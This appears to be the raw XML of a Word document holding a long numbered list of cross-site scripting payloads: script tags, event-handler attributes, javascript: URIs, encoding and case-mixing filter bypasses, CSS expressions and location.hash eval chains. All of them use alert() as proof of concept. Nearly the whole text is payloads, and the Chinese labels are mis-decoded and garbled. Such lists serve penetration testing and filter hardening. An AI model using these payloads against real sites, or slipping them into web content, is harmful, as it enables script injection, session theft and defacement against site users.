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B79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&lt;script&gt;alert(1)&lt;/script&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A863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&lt;script&gt;alert(2)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF12D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medium--&gt; Ë«Ð´ÈÆ¹ý£º&lt;sc&lt;script&gt;ript&gt;alert(4)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587BDD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ab/>
        <w:t xml:space="preserve">    ´óÐ¡Ð´»ìÏýÈÆ¹ý£º&lt;ScRipt&gt;alert(5)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF837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ab/>
        <w:t>&lt;img src=1 onerror=alert(7)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F63E0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onmouseover=¡¯alert(9)¡¯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A287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&lt;script&gt;alert(11);&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774587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&gt;"'&gt;&lt;img src="javascript.:alert(12)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417ABB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&gt;"'&gt;&lt;script&gt;alert(13)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C75F6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background='javascript.:alert(14)'&gt;&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74740BE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type=text/html data='javascript.:alert(15);'&gt;&lt;/object&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F967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"+alert(16)+"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55149B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&lt;body/onfocus=top.alert(17)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AAFE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&lt;img/src=22 onerror=window.alert(22)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA7F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src=62 onerror=(function(){alert(62)})()&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EC0E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src=63 onerror=!function(){alert(63)}()&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EA76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src=64 onerror=%2bfunction(){alert(64)}()&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D0E5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src=65 onerror=%2dfunction(){alert(65)}()&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1401CAB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src=66 onerror=~function(){alert(66)}()&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CA15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href="javascript:`${alert(69)}`"&gt;XSS Test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA341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href="javascript:[''].findIndex(alert(71)"&gt;XSS Test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04041B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onload=location=['javascript:alert(79)'].join(")&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA637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href="javascript:(new Function('alert(80))()"&gt;XSS Test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAEF5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&lt;body/onload=Function(alert(81))()&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FB7D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&lt;img%0Dsrc=82 onerror=Function(alert(82))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0629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href="javascript:(new (Object.getPrototypeOf(async function(){}).constructor)('alert(84))()"&gt;XSS Test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23708BE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&lt;body/onload=eval(location.hash.slice(85))&gt;#alert(85)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2D0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&lt;body/onload=setTimeout(location.hash.substr(86))()&gt;#alert(86)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA9E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&lt;body/onload=Set.constructor(location.hash.substr(87))()&gt;#alert(87)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D0850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&lt;body/onload=execScript(location.hash.substr(88))&gt;#alert(88)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328B107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&lt;body/onload=Function(location.hash.slice(90))()&gt;#alert(90)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C03794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&lt;svg/onload=alert(91)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5151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onload=eval(URL.slice(-8))&gt;#alert(93)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A3C26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&lt;body/onload=eval(location.hash.slice(94))&gt;#javascript:alert(94)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3366A7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src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(97)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042E82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src=101 onerror=location="javascript:alert(101)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0763B0E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&lt;svg/onload="javascript:alert(103)" xmlns="http://www.baidu.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168545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&lt;svg/onload=location='javascript:/*'%2blocation.hash&gt; #*/alert(105)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B924C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&lt;svg/onload=location="javascript:"%2binnerHTML%2blocation.hash&gt;"  #"-alert(107)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C5C0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&lt;svg/onload=with(location)with(hash)eval(alert(109))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6F8F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onload=alert(140)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EEB9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onpageshow=alert(141)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E58B1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onfocus=alert(142)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F33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&lt;body onhashchange=alert(143)&gt;&lt;a href=#&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45765D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style=overflow:auto;height:144000px onscroll=alert(144) id=x&gt;#x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F1BB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alert(145)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x id=x&gt;#x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB8E6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onstart=alert(146)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6758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loop=147 width=0 onfinish=alert(147)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE32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&lt;audio src onloadstart=alert(148)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC16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onloadstart=alert(149)&gt;&lt;source&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF5A5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autofocus onblur=alert(150)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E965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&lt;keygen autofocus onfocus=alert(151)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F36B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onsubmit=alert(152)&gt;&lt;input type=submit&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796081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&lt;select onchange=alert(153)&gt;&lt;option&gt;153&lt;option&gt;2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06441A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&lt;menu id=x contextmenu=x onshow=alert(154)&gt;right click me!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE67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onblur=alert(155)&gt;lose focus!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA22B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onclick=alert(156)&gt;click this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447CCD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oncopy=alert(157)&gt;copy this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E5ECD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oncontextmenu=alert(158)&gt;right click this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BAE4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oncut=alert(159)&gt;copy this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ECE0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ondblclick=alert(160)&gt;double click this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177898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ondrag=alert(161)&gt;drag this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088F73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onfocus=alert(162)&gt;focus this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023C66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oninput=alert(163)&gt;input here!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6226B5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onkeydown=alert(164)&gt;press any key!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0204AAC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onkeypress=alert(165)&gt;press any key!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081954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onkeyup=alert(166)&gt;press any key!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED2B21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onmousedown=alert(167)&gt;click this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0406F82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onmousemove=alert(168)&gt;hover this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6A0E7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onmouseout=alert(169)&gt;hover this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B9A4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onmouseover=alert(170)&gt;hover this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D94E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onmouseup=alert(171)&gt;click this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209692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contenteditable onpaste=alert(172)&gt;paste here!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B760B8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onblur=alert(173)&gt;lose focus!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5F9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onclick=alert(174)&gt;click this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C68AA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oncopy=alert(175)&gt;copy this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7653A1F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oncontextmenu=alert(176)&gt;right click this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A0C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oncut=alert(177)&gt;copy this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424DB0F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ondblclick=alert(178)&gt;double click this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398BC7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ondrag=alert(179)&gt;drag this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4264286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onfocus=alert(180)&gt;focus this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176E5C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oninput=alert(181)&gt;input here!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE02C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onkeydown=alert(182)&gt;press any key!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A22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onkeypress=alert(183)&gt;press any key!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC8C60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&lt;brute contenteditable onkeyup=alert(184)&gt;press any key!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A62DA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onmousedown=alert(185)&gt;click this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6760C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onmousemove=alert(186)&gt;hover this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7F75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onmouseout=alert(187)&gt;hover this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D806D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onmouseover=alert(188)&gt;hover this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C32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onmouseup=alert(189)&gt;click this!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8255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contenteditable onpaste=alert(190)&gt;paste here!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561999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style=font-size:500px onmouseover=alert(191)&gt;0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F279C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style=font-size:500px onmouseover=alert(192)&gt;000192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA3A4D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style=font-size:500px onmouseover=alert(193)&gt;0002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F6A8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&lt;brute style=font-size:500px onmouseover=alert(194)&gt;0003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BADB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src=javascript:alert(196)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797CA9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src=javascript:alert(197)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E708C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src=javascript:alert(198)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECE22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href=javascript:alert(200)&gt;click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450496D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&lt;math&gt;&lt;brute href=javascript:alert(201)&gt;click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1C7D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action=javascript:alert(203)&gt;&lt;input type=submit&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C006E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&lt;isindex action=javascript:alert(204) type=submit value=click&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AAA1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formaction=javascript:alert(206)&gt;click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78029D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&lt;form&gt;&lt;input formaction=javascript:alert(207) type=submit value=click&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176862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&lt;form&gt;&lt;input formaction=javascript:alert(208) type=image value=click&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8DE7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&lt;form&gt;&lt;input formaction=javascript:alert(209) type=image src=http://brutelogic.com.br/webgun/img/youtube209.jpg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF80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&lt;isindex formaction=javascript:alert(210) type=submit value=click&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E100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data=javascript:alert(212)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DE8B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xlink:href=data:,alert(216)&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529487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xlink:href=data:,alert(217) /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2717C1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&lt;math&gt;&lt;brute xlink:href=javascript:alert(218)&gt;click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556864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&lt;svg&gt;&lt;a xmlns:xlink=http://www.w3.org/220999/xlink xlink:href=?&gt;&lt;circle r=400 /&gt;&lt;animate attributeName=xlink:href begin=0 from=javascript:alert(220) to=%26&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E2C5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'&gt;&lt;script&gt;alert(221)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BEC5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='&gt;&lt;script&gt;alert(222)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC3D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&lt;script&gt;alert(223)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCED4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&lt;script&gt;alert(224)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B2851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&lt;s&amp;#99;ript&gt;alert(225)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A82F9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src="javas&amp;#99;ript:alert(226)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1035F60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%0a%0a&lt;script&gt;alert(227)&lt;/script&gt;.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012CBD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%3c/a%3e%3cscript%3ealert(228)%3c/script%3e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F04E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%3c/title%3e%3cscript%3ealert(229)%3c/script%3e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544CF5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%3cscript%3ealert(230)%3c/script%3e/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2779E3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&lt;script&gt;alert(231)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A201C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a.jsp/&lt;script&gt;alert(232)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEC34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"&gt;&lt;script&gt;alert(233)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C99DA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SRC="javascript.:alert(234);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156885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 SRC="jav&amp;#x09;ascript.:alert(238);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E21C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SRC="jav&amp;#x0A;ascript.:alert(239);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6003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SRC="jav&amp;#x0D;ascript.:alert(240);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347609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"&lt;IMG src="/java"\0script.:alert(241)&gt;";'&gt;out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5EF6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 javascript.:alert(242);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69129C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&lt;SCRIPT&gt;a=/XSS/alert(243)&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA84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BACKGROUND="javascript.:alert(244)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA8F0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ONLOAD=alert(245)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1733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DYNSRC="javascript.:alert(246)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B238A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LOWSRC="javascript.:alert(247)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7D0F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SRC="javascript.:alert(248);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D11A0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size="&amp;{alert(249)}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE149A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REL="stylesheet"HREF="javascript.:alert(251);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D358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&lt;META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert(253);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350713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BACKGROUND="javascript.:alert(256)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8B9C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url(javascript.:alert(257))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F38E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expression(alert(259));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC076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&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(260)';&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318035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STYLE='xss:expre\ssion(alert(261))'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A24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&lt;STYLE. TYPE="text/javascript"&gt;alert(262);&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B234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&lt;STYLE. TYPE="text/css"&gt;.XSS{background-image:url("javascript.:alert(263)");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338F01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&lt;STYLE. type="text/css"&gt;BODY{background:url("javascript.:alert(264)")}&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10370DF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HREF="javascript.:alert(265);//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2076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getURL("javascript.:alert(266)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1778ADC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a="get";b="URL";c="javascript.:";d="alert(267);";eval(a+b+c+d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAF28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&lt;XML SRC="javascript.:alert(268);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AC9B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 &lt;BODY NLOAD="a();"&gt;&lt;SCRIPT&gt;function a(){alert(269);}&lt;/SCRIPT&gt;&lt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC819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SRC="javascript.:alert(271)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10978A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&lt;script\x20type="text/javascript"&gt;javascript:alert(278);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209F2A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&lt;script\x3Etype="text/javascript"&gt;javascript:alert(279);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15339F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&lt;script\x0Dtype="text/javascript"&gt;javascript:alert(280);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7873695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&lt;script\x09type="text/javascript"&gt;javascript:alert(281);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D586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&lt;script\x0Ctype="text/javascript"&gt;javascript:alert(282);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7554E5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&lt;script\x2Ftype="text/javascript"&gt;javascript:alert(283);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB71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&lt;script\x0Atype="text/javascript"&gt;javascript:alert(284);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F71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'`"&gt;&lt;\x3Cscript&gt;javascript:alert(285)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3971A2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'`"&gt;&lt;\x00script&gt;javascript:alert(286)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5779C48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src=287 href=287 onerror="javascript:alert(287)"&gt;&lt;/img&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75760D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&lt;audio src=288 href=288 onerror="javascript:alert(288)"&gt;&lt;/audio&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF364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src=289 href=289 onerror="javascript:alert(289)"&gt;&lt;/video&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B6B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src=290 href=290 onerror="javascript:alert(290)"&gt;&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E337C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&lt;image src=291 href=291 onerror="javascript:alert(291)"&gt;&lt;/image&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E86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src=292 href=292 onerror="javascript:alert(292)"&gt;&lt;/object&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF2C3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 src=293 href=293 onerror="javascript:alert(293)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4FF3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onResize svg onResize="javascript:javascript:alert(294)"&gt;&lt;/svg onResize&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F4B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&lt;title onPropertyChange title onPropertyChange="javascript:javascript:alert(295)"&gt;&lt;/title onPropertyChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42835E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onLoad iframe onLoad="javascript:javascript:alert(296)"&gt;&lt;/iframe onLoad&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C033A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onMouseEnter body onMouseEnter="javascript:javascript:alert(297)"&gt;&lt;/body onMouseEnter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A18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onFocus body onFocus="javascript:javascript:alert(298)"&gt;&lt;/body onFocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D080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onScroll frameset onScroll="javascript:javascript:alert(299)"&gt;&lt;/frameset onScroll&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E72B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onReadyStateChange script onReadyStateChange="javascript:javascript:alert(300)"&gt;&lt;/script onReadyStateChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C815A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onMouseUp html onMouseUp="javascript:javascript:alert(301)"&gt;&lt;/html onMouseUp&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980E9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onPropertyChange body onPropertyChange="javascript:javascript:alert(302)"&gt;&lt;/body onPropertyChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018607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 svg onLoad="javascript:javascript:alert(303)"&gt;&lt;/svg onLoad&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCB5A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onPageHide body onPageHide="javascript:javascript:alert(304)"&gt;&lt;/body onPageHide&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D60480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onMouseOver body onMouseOver="javascript:javascript:alert(305)"&gt;&lt;/body onMouseOver&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B6FCD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onUnload body onUnload="javascript:javascript:alert(306)"&gt;&lt;/body onUnload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640F3F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 body onLoad="javascript:javascript:alert(307)"&gt;&lt;/body onLoad&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3800A7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onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(308)"&gt;&lt;/bgsound onPropertyChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C35B3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onMouseLeave html onMouseLeave="javascript:javascript:alert(309)"&gt;&lt;/html onMouseLeave&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032AFE9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onMouseWheel html onMouseWheel="javascript:javascript:alert(310)"&gt;&lt;/html onMouseWheel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237593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onLoad style onLoad="javascript:javascript:alert(311)"&gt;&lt;/style onLoad&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B74B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onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(312)"&gt;&lt;/iframe onReadyStateChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DEFF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onPageShow body onPageShow="javascript:javascript:alert(313)"&gt;&lt;/body onPageShow&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEA2E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onReadyStateChange style onReadyStateChange="javascript:javascript:alert(314)"&gt;&lt;/style onReadyStateChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDE3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onFocus frameset onFocus="javascript:javascript:alert(315)"&gt;&lt;/frameset onFocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080EC9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onError applet onError="javascript:javascript:alert(316)"&gt;&lt;/applet onError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6543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onStart marquee onStart="javascript:javascript:alert(317)"&gt;&lt;/marquee onStart&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E2B8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onLoad script onLoad="javascript:javascript:alert(318)"&gt;&lt;/script onLoad&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D7EE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onMouseOver html onMouseOver="javascript:javascript:alert(319)"&gt;&lt;/html onMouseOver&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF505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onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(320)"&gt;&lt;/html onMouseEnter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E9D3C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onBeforeUnload body onBeforeUnload="javascript:javascript:alert(321)"&gt;&lt;/body onBeforeUnload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226DD1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&lt;html onMouseDown html onMouseDown="javascript:javascript:alert(322)"&gt;&lt;/html </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>onMouseDown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FFB1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onScroll marquee onScroll="javascript:javascript:alert(323)"&gt;&lt;/marquee onScroll&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1140AE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&lt;xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(324)"&gt;&lt;/xml onPropertyChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79662B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onBlur frameset onBlur="javascript:javascript:alert(325)"&gt;&lt;/frameset onBlur&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA611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onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(326)"&gt;&lt;/applet onReadyStateChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FEB3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onUnload svg onUnload="javascript:javascript:alert(327)"&gt;&lt;/svg onUnload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46441A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onMouseOut html onMouseOut="javascript:javascript:alert(328)"&gt;&lt;/html onMouseOut&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBD9E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onMouseMove body onMouseMove="javascript:javascript:alert(329)"&gt;&lt;/body onMouseMove&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7393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onResize body onResize="javascript:javascript:alert(330)"&gt;&lt;/body onResize&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DCBF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onError object onError="javascript:javascript:alert(331)"&gt;&lt;/object onError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AB55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onPopState body onPopState="javascript:javascript:alert(332)"&gt;&lt;/body onPopState&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF4A04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onMouseMove html onMouseMove="javascript:javascript:alert(333)"&gt;&lt;/html onMouseMove&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB673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onreadystatechange applet onreadystatechange="javascript:javascript:alert(334)"&gt;&lt;/applet onreadystatechange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357330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onpagehide body onpagehide="javascript:javascript:alert(335)"&gt;&lt;/body onpagehide&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1F9B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onunload svg onunload="javascript:javascript:alert(336)"&gt;&lt;/svg onunload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9362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onerror applet onerror="javascript:javascript:alert(337)"&gt;&lt;/applet onerror&gt;</w:t>
      </w:r>
    </w:p>
